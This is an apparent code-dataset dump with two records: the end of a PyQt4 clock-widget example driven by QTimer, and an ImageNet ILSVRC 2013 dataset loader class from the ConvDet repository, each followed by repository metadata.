    def __init__(self, parent=None):
        QtGui.QWidget.__init__(self, parent)
        self.setWindowTitle("Использование класса QTimer")
        self.resize(200, 100)
        self.label = QtGui.QLabel("")
        self.label.setAlignment(QtCore.Qt.AlignCenter)
        self.button1 = QtGui.QPushButton("Запустить")
        self.button2 = QtGui.QPushButton("Остановить")
        # "Stop" starts disabled because the timer is not running yet.
        self.button2.setEnabled(False)
        vbox = QtGui.QVBoxLayout()
        vbox.addWidget(self.label)
        vbox.addWidget(self.button1)
        vbox.addWidget(self.button2)
        self.setLayout(vbox)
        # Old-style (PyQt4 string-based) signal/slot connections.
        self.connect(self.button1, QtCore.SIGNAL("clicked()"),
                     self.on_clicked_button1)
        self.connect(self.button2, QtCore.SIGNAL("clicked()"),
                     self.on_clicked_button2)
        self.timer = QtCore.QTimer()
        self.connect(self.timer, QtCore.SIGNAL("timeout()"),
                     self.on_timeout);

    def on_clicked_button1(self):
        """Start the clock and swap the enabled state of the buttons."""
        self.timer.start(1000)  # 1 second
        self.button1.setEnabled(False)
        self.button2.setEnabled(True)

    def on_clicked_button2(self):
        """Stop the clock and swap the enabled state of the buttons."""
        self.timer.stop()
        self.button1.setEnabled(True)
        self.button2.setEnabled(False)

    def on_timeout(self):
        # Fired once per second: show the current time as HH:MM:SS.
        self.label.setText(time.strftime("%H:%M:%S"))
if __name__ == "__main__":
    # Standard Qt bootstrap: create the application, show the window and
    # hand control to the event loop until the window is closed.
    import sys
    app = QtGui.QApplication(sys.argv)
    window = MyWindow()
    window.show()
    sys.exit(app.exec_())
"sergejyurskyj@yahoo.com"
] | sergejyurskyj@yahoo.com |
516ca97ed4de2823f6105dd13e51cbf631df8882 | ef9d010451492f896e611130630865ad82da4351 | /src/dataset/imagenet.py | 718ebfaf9c6156ab8c9777b9e1668593b762f18b | [
"BSD-2-Clause"
] | permissive | goan15910/ConvDet | 72125bb7b35734237ef7480785ce1d205a684a31 | 6404622cc9d0c8e8b756260c4979b6842b2d0cb0 | refs/heads/master | 2021-01-11T14:19:21.335131 | 2017-05-16T07:40:48 | 2017-05-16T07:40:48 | 81,350,946 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,304 | py |
"""Image data base class for ILSVRC 2013"""
import cv2
import os
import numpy as np
import xml.etree.ElementTree as ET
from dataset.imdb import imdb
class imagenet(imdb):
    """Image database for ILSVRC 2013 classification data.

    Reads the image-set index and the CLS-LOC validation ground-truth
    labels, and serves resized (optionally mean-subtracted) image batches.
    """

    def __init__(self, image_set, data_path, mc):
        # imdb.__init__ receives the dataset name and the model config;
        # `mc` is exposed afterwards as self.mc (set by the base class).
        imdb.__init__(self, 'ILSVRC2013_'+image_set, mc)
        self._image_set = image_set
        self._data_path = data_path
        self._classes = self.mc.CLASS_NAMES
        #self._class_to_idx = dict(zip(self.classes, range(self.num_classes)))
        # a list of string indices of images in the directory
        self._image_idx = self._load_image_set_idx()
        # a list of class labels
        self.labels = self._load_imagenet_labels()
        ## batch reader ##
        self._perm_idx = None
        self._cur_idx = 0
        # _shuffle_image_idx (inherited from imdb) fills _perm_idx and
        # resets _cur_idx; it is re-invoked whenever an epoch runs out.
        self._shuffle_image_idx()

    def _load_image_set_idx(self):
        """Return the list of image id strings from ImageSets/<set>.txt."""
        image_set_file = os.path.join(self._data_path, 'ImageSets',
                                      self._image_set+'.txt')
        assert os.path.exists(image_set_file), \
            'File does not exist: {}'.format(image_set_file)
        with open(image_set_file) as f:
            image_idx = [x.strip() for x in f.readlines()]
        return image_idx

    def _image_path_at(self, idx):
        """Return the path of the JPEG file for image id `idx`."""
        image_path = os.path.join(self._data_path, 'Data', self._image_set, idx+'.JPEG')
        assert os.path.exists(image_path), \
            'Image does not exist: {}'.format(image_path)
        return image_path

    def _load_imagenet_labels(self):
        """Load the CLS-LOC validation ground-truth class ids (one 1-based
        integer per line, ordered by validation image number)."""
        labels_file = os.path.join(self._data_path, 'ILSVRC2013_devkit',
                                   'data', 'ILSVRC2013_clsloc_validation_ground_truth.txt')
        assert os.path.exists(labels_file), \
            'File does not exist: {}'.format(labels_file)
        with open(labels_file, 'r') as f:
            lines = f.readlines()
        labels = [ int(line.strip()) for line in lines ]
        return labels

    def read_cls_batch(self, shuffle=True):
        """Read a batch of images and labels

        Args:
          shuffle: whether or not to shuffle the dataset
        Returns:
          images: list of arrays [h, w, c]
          labels: list of class indexes
          scales: list of resize scale factor
        """
        mc = self.mc
        if shuffle:
            # Reshuffle once the permutation is nearly exhausted; the
            # leftover tail of the old permutation is dropped.
            if self._cur_idx + mc.BATCH_SIZE >= len(self._image_idx):
                self._shuffle_image_idx()
            batch_idx = self._perm_idx[self._cur_idx:self._cur_idx+mc.BATCH_SIZE]
            self._cur_idx += mc.BATCH_SIZE
        else:
            # Sequential mode wraps around to the start of the index list.
            if self._cur_idx + mc.BATCH_SIZE >= len(self._image_idx):
                batch_idx = self._image_idx[self._cur_idx:] \
                    + self._image_idx[:self._cur_idx + mc.BATCH_SIZE-len(self._image_idx)]
                self._cur_idx += mc.BATCH_SIZE - len(self._image_idx)
            else:
                batch_idx = self._image_idx[self._cur_idx:self._cur_idx+mc.BATCH_SIZE]
                self._cur_idx += mc.BATCH_SIZE
        images, labels, scales = [], [], []
        for i in batch_idx:
            # cv2.imread yields an HxWx3 BGR array; mean subtraction (when
            # enabled) therefore happens in BGR order, before resizing.
            im = cv2.imread(self._image_path_at(i))
            if mc.SUB_BGR_MEANS:
                im = im.astype(np.float32, copy=False)
                im -= mc.BGR_MEANS
            orig_h, orig_w, _ = [float(v) for v in im.shape]
            im = cv2.resize(im, (mc.IMAGE_WIDTH, mc.IMAGE_HEIGHT))
            x_scale = mc.IMAGE_WIDTH/orig_w
            y_scale = mc.IMAGE_HEIGHT/orig_h
            images.append(im)
            # Assumes image ids end in '_<number>' -- TODO confirm. Both the
            # file number and the ground-truth ids are 1-based, hence the -1s.
            label_idx = int(i.split('_')[-1])-1
            labels.append(self.labels[label_idx]-1)
            scales.append((x_scale, y_scale))
        return images, labels, scales
| [
"goan15910@cml19.csie.ntu.edu.tw"
] | goan15910@cml19.csie.ntu.edu.tw |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.